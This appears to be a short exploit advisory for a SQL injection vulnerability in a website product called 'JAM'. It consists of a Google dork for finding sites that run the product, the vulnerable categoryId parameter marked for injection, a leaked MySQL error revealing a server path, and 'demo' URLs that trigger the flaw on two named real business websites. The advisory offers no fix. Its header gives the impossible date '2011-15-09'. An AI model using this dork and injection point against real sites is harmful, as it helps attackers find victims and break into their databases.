_________________________________________________________
#                                                                                                                   
#  Exploit Title: JAM SQL Injection Vulnerability                          
#  Google Dork: intext:"This site is preserved by JAM"                                                               
#  Date: 2011-15-09                                                                                     
#  Author: nGa Sa Lu [ N-S-L ]   
#  Service Link: http://www.jamarketing.co.nz                                                 
#  Tested on: Debian GNU/Linux 5.0                                                            
# ________________________________________________________ 

# Google Dork : intext:"This site is preserved by JAM"
-------------------------------------------------------

------------------------------------------------------------------------------------------------
www.localhost.com/products.php?action=viewCategoryProducts&page=1&categoryId=[SQL]
------------------------------------------------------------------------------------------------

# SQL Error Statement
------------------------
 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/jenniferannweb/advancehire.co.nz/functions.php on line 143

# Demo
---------
 http://www.advancehire.co.nz/products.php?action=viewCategoryProducts&page=1&categoryId=30'
 http://www.bellachic.co.nz/product_reviews_info.php?products_id=537&reviews_id=52'